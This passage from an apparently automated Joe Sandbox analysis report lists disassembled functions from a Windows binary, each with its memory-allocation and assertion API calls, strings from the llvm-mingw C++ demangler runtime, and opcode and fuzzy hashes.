realloc.MSVCRT ref: 00007FF6099CE0A3

Strings

noexcept, xrefs: 00007FF6099CDFFD
imaginary, xrefs: 00007FF6099CDF7E

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$malloc
String ID: imaginary$noexcept
API String ID: 454241450-3971218317
Opcode ID: 87dcfbe6bad413ec65d64ef39e25c3b70162464389fa30d34c7d9aefbdbe6664
Instruction ID: b84d42cf3582b433a1551c57577c088fc103765f90efc5a8e5d5bbba715f38e7
Opcode Fuzzy Hash: 87dcfbe6bad413ec65d64ef39e25c3b70162464389fa30d34c7d9aefbdbe6664
Instruction Fuzzy Hash: 8351B1B2A06B8682EB288F55E4407AD73A1EB58BC4F288531DB8E47796EF3CD551C340

Function 00007FF6099B16B0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF6099B1843
_assert.MSVCRT ref: 00007FF6099B185D
_assert.MSVCRT ref: 00007FF6099B1877

Part of subcall function 00007FF6099B4BC0: fflush.MSVCRT ref: 00007FF6099B4C0E

Part of subcall function 00007FF6099B4CA0: fflush.MSVCRT ref: 00007FF6099B4CE3

Strings

results.reason == _URC_HANDLER_FOUND, xrefs: 00007FF6099B1849, 00007FF6099B1863
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp, xrefs: 00007FF6099B1836, 00007FF6099B1850, 00007FF6099B186A
actions & _UA_CLEANUP_PHASE, xrefs: 00007FF6099B182F

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assert$fflush
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp$actions & _UA_CLEANUP_PHASE$results.reason == _URC_HANDLER_FOUND
API String ID: 289967094-1554099779
Opcode ID: 53fe620101f0f1196f6f36d0f1a8cbc34963f56b63f02f4e93a45d900a4484cd
Instruction ID: 1c238399922d200ef7d8cb77fed1233a26826eb9a8a93c2df5e45fed7c3ab0f3
Opcode Fuzzy Hash: 53fe620101f0f1196f6f36d0f1a8cbc34963f56b63f02f4e93a45d900a4484cd
Instruction Fuzzy Hash: B341BD21F0D64241FF729F82E2A07BA63A6AB95790F2C4135DE4DC7B97DE2DE5418380

Function 00007FF6099CEB50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099CEB8E
realloc.MSVCRT ref: 00007FF6099CEBEA
realloc.MSVCRT ref: 00007FF6099CEC45
realloc.MSVCRT ref: 00007FF6099CECA6

Strings

tInt, xrefs: 00007FF6099CEBFF
unsigned, xrefs: 00007FF6099CEBA3

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: tInt$unsigned
API String ID: 471065373-1789806510
Opcode ID: ef3acf26705adc4dc0c40c1580519def5e7105bcddab961c785bcf0feaa8951c
Instruction ID: babcdf3048815eddcaca15ed807ed760bd8f692ef5facaf732cdcd925972c93c
Opcode Fuzzy Hash: ef3acf26705adc4dc0c40c1580519def5e7105bcddab961c785bcf0feaa8951c
Instruction Fuzzy Hash: C9414FF2A06B8682DA25DF56F45426DB3A2EB64BC0F54C531CB9E47792EF3CE5418340

Function 00007FF6099C12D2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 103stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6099C0B79
malloc.MSVCRT ref: 00007FF6099C1396
memcpy.MSVCRT ref: 00007FF6099C13B5

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099C1E5C
starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6099C1E55

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: mallocmemcpystrlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 3344349799-3503049562
Opcode ID: 411cc94d638b4c5a65666b04f682356d8a7e8c8d03e2840adf31fc5fabca7cb3
Instruction ID: 47f4c820850cf641a22684a9b361f58d95e41f43f662923e02467d4006ee0e2f
Opcode Fuzzy Hash: 411cc94d638b4c5a65666b04f682356d8a7e8c8d03e2840adf31fc5fabca7cb3
Instruction Fuzzy Hash: 2C41506260AB0682EE759F16A94026E63A6EB45780F680435DA8E87BA3DF3CE145C354

Function 00007FF6099CF160 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099CF1A9
realloc.MSVCRT ref: 00007FF6099CF1F5
realloc.MSVCRT ref: 00007FF6099CF277
_assert.MSVCRT ref: 00007FF6099CF2C8

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/Utility.h, xrefs: 00007FF6099CF2BB
CurrentPosition, xrefs: 00007FF6099CF2B4

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$_assert
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/Utility.h$CurrentPosition
API String ID: 940201557-3339543485
Opcode ID: 7acef73fbec41d6dfa1be67c13337ccc807f794cd771a4b3e4e2917c685efc0b
Instruction ID: 27f962b13596cc8f078ecdd261ce1ef6495d58678ae05c89896959d4e23a34ee
Opcode Fuzzy Hash: 7acef73fbec41d6dfa1be67c13337ccc807f794cd771a4b3e4e2917c685efc0b
Instruction Fuzzy Hash: FE4143B6A09F4682EF29CF56E8942797762EB58BC0F588532CB8E47795DF7CE4418300

Function 00007FF6099D8410 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6099D842F
wcscpy.MSVCRT ref: 00007FF6099D8490
wcscat.MSVCRT ref: 00007FF6099D849B
wcslen.MSVCRT ref: 00007FF6099D84AC

Strings

0, xrefs: 00007FF6099D84D9
@, xrefs: 00007FF6099D84E1
, xrefs: 00007FF6099D850B

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: memsetwcscatwcscpywcslen
String ID: $0$@
API String ID: 468205783-2347541974
Opcode ID: e183844e820dd185498d54a444cfdf65eda0e2a936280ba6ff7fda81fa3f1c34
Instruction ID: 22e9c73a20de05424861a3b3f8d67ec94616e937b825c3e9686835733f808c96
Opcode Fuzzy Hash: e183844e820dd185498d54a444cfdf65eda0e2a936280ba6ff7fda81fa3f1c34
Instruction Fuzzy Hash: 8041AF6191E68281F310CF25F4443BAB762FB85784F280135EA8D92FAADFBDD145CB01

Function 00007FF6099CB364 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099CB3E6
memcpy.MSVCRT ref: 00007FF6099CB400
_assert.MSVCRT ref: 00007FF6099CB42A

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099CB41D
starts_with(SV, "basic_"), xrefs: 00007FF6099CB416
basic_string, xrefs: 00007FF6099CB364

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assertmemcpyrealloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$basic_string$starts_with(SV, "basic_")
API String ID: 2326172077-800580732
Opcode ID: 1cf50003512e3ea4dae628e96ebf30add7ca9d163f89edfb160867659c8d9a78
Instruction ID: 03b04dcdd88393934ee555b68700cffb99e96b4152d8eceddd9c6e532245b201
Opcode Fuzzy Hash: 1cf50003512e3ea4dae628e96ebf30add7ca9d163f89edfb160867659c8d9a78
Instruction Fuzzy Hash: 000184F2F0AA4292EA149F59F9C12796363EF647C4F684431C64D87796EF2CE591C300

Function 00007FF6099CAA50 Relevance: 9.3, APIs: 6, Instructions: 291stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099CAB61
malloc.MSVCRT ref: 00007FF6099CAC3F
malloc.MSVCRT ref: 00007FF6099CACD3
strlen.MSVCRT ref: 00007FF6099CAD56
malloc.MSVCRT ref: 00007FF6099CAD7D
realloc.MSVCRT ref: 00007FF6099CAE58

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$reallocstrlen
String ID:
API String ID: 2374275640-0
Opcode ID: 9fcff9b977f65c3a391a145938d85213577a97e659ce38ebb67324265da1d897
Instruction ID: c3e22d827279a97cc0adcb2ee7e430465fcce223d3c840f190cffd0a5f945d4e
Opcode Fuzzy Hash: 9fcff9b977f65c3a391a145938d85213577a97e659ce38ebb67324265da1d897
Instruction Fuzzy Hash: 6CC116A260ABC546EB158F25D4503AD67A2EB45B81F2C8A31CB9D873D7DF3CE592C300

Function 00007FF6099C8DB0 Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099C8DEE
realloc.MSVCRT ref: 00007FF6099C8E72
realloc.MSVCRT ref: 00007FF6099C8ECD
realloc.MSVCRT ref: 00007FF6099C8F2B
realloc.MSVCRT ref: 00007FF6099C8F7C
memcpy.MSVCRT ref: 00007FF6099C8F96

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 30d2cb59483826d978f11d2be31c172a2ece989509a146521bc4926f218ec95d
Instruction ID: da55d10447b6f7864f5fd05d3b58222a84bc8186100f95d7928c44da8f1806e3
Opcode Fuzzy Hash: 30d2cb59483826d978f11d2be31c172a2ece989509a146521bc4926f218ec95d
Instruction Fuzzy Hash: C45175F2A06B4683DF249F57E85026DA362EB54BC4F188932CB9E47792DF3CE4518340

Function 00007FF6099C5E30 Relevance: 9.1, APIs: 6, Instructions: 140COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099C5E78
memcpy.MSVCRT ref: 00007FF6099C5E96
realloc.MSVCRT ref: 00007FF6099C5ED8
realloc.MSVCRT ref: 00007FF6099C5F35
realloc.MSVCRT ref: 00007FF6099C5F87
realloc.MSVCRT ref: 00007FF6099C5FE8

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: d16cc2fde265a49c118596b96dd5b5cfa61d07f1c591749a92ff39ed06f51163
Instruction ID: fdf6928f42ed6c57424d58dd4353ecc6683339cac44818781755236ac6bc65eb
Opcode Fuzzy Hash: d16cc2fde265a49c118596b96dd5b5cfa61d07f1c591749a92ff39ed06f51163
Instruction Fuzzy Hash: 3D5152B2A06B4683DA25DF56F95026DB3A6FB68BC0F548535DB8E47792EF3CE4418300

Function 00007FF6099C6030 Relevance: 9.1, APIs: 6, Instructions: 128COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099C6078
memcpy.MSVCRT ref: 00007FF6099C6096
realloc.MSVCRT ref: 00007FF6099C60D1
realloc.MSVCRT ref: 00007FF6099C6155
realloc.MSVCRT ref: 00007FF6099C61AB
memcpy.MSVCRT ref: 00007FF6099C61C5

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 6905e7ca18b6a58da2f216068c29ad50521c822ba058662085adb930a16d6f30
Instruction ID: 1036f591e5baa2124e9ff004c431dcee7545cf083beb7ef0d9bb6041e3101d42
Opcode Fuzzy Hash: 6905e7ca18b6a58da2f216068c29ad50521c822ba058662085adb930a16d6f30
Instruction Fuzzy Hash: C25175F6A05B4683DE298F16E85026DA362FB58BC4F588531CF8E47792EF3CE4518300

Function 00007FF6099B4F64 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF6099B4F78
TlsGetValue.KERNEL32 ref: 00007FF6099B4FAF
GetLastError.KERNEL32 ref: 00007FF6099B4FB4
LeaveCriticalSection.KERNEL32 ref: 00007FF6099B5072
free.MSVCRT ref: 00007FF6099B5094
DeleteCriticalSection.KERNEL32 ref: 00007FF6099B50BD

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
String ID:
API String ID: 3326252324-0
Opcode ID: 08f0997568cc7a319e12c3eb93543c3c92b5c3fd4d446526cdcdb6b294db1472
Instruction ID: be3928a89caa81d47c3c7bb8081862e6b91dd6d5178e5f14464b6790b5471160
Opcode Fuzzy Hash: 08f0997568cc7a319e12c3eb93543c3c92b5c3fd4d446526cdcdb6b294db1472
Instruction Fuzzy Hash: 0921EA24E0E90282F6559F51EA543742373BF45BA0FB90031DE4EC77A6EF6DA846C340

Function 00007FF6099CED80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099CEDB1
realloc.MSVCRT ref: 00007FF6099CEE68
realloc.MSVCRT ref: 00007FF6099CEEFF

Strings

vector[, xrefs: 00007FF6099CEE7D
pixel ve, xrefs: 00007FF6099CEE8C

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$malloc
String ID: vector[$pixel ve
API String ID: 454241450-4216275618
Opcode ID: c7e31e28da302632c023a726f4a17732f91bf8205f05fac472730efd64aa863f
Instruction ID: 6f837b6fa5207789982573507e30c2478b0c3bca4b53d002aafdf08e2d69976c
Opcode Fuzzy Hash: c7e31e28da302632c023a726f4a17732f91bf8205f05fac472730efd64aa863f
Instruction Fuzzy Hash: 1841C4B2A05B8582DA14CF16E84466D77B6FB58BC0F188931DF9D4B7A2DF3CD5928300

Function 00007FF6099C0BE5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 117stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6099C0B79
malloc.MSVCRT ref: 00007FF6099C0C1B
_assert.MSVCRT ref: 00007FF6099C1E69
malloc.MSVCRT ref: 00007FF6099C1EB6

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099C1E5C
starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6099C1E55

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$_assertstrlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 3012236610-3503049562
Opcode ID: 01387742c7347a065d0d3fa100ad1a8c0eb405b46fc2f649a98275b690413a58
Instruction ID: c1a2ccc6537324d17117ff08f86b30a328a8146d79d2bdd3fc928e3d263a06df
Opcode Fuzzy Hash: 01387742c7347a065d0d3fa100ad1a8c0eb405b46fc2f649a98275b690413a58
Instruction Fuzzy Hash: C8411533616B8185EB11CF19E4447A837A9FB04B91F2A4635DF5C4B7A2DF38E692C310

Function 00007FF6099C87F0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099C8833
realloc.MSVCRT ref: 00007FF6099C889B

Strings

template, xrefs: 00007FF6099C8848
> typena, xrefs: 00007FF6099C88AC
ame , xrefs: 00007FF6099C88BA

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
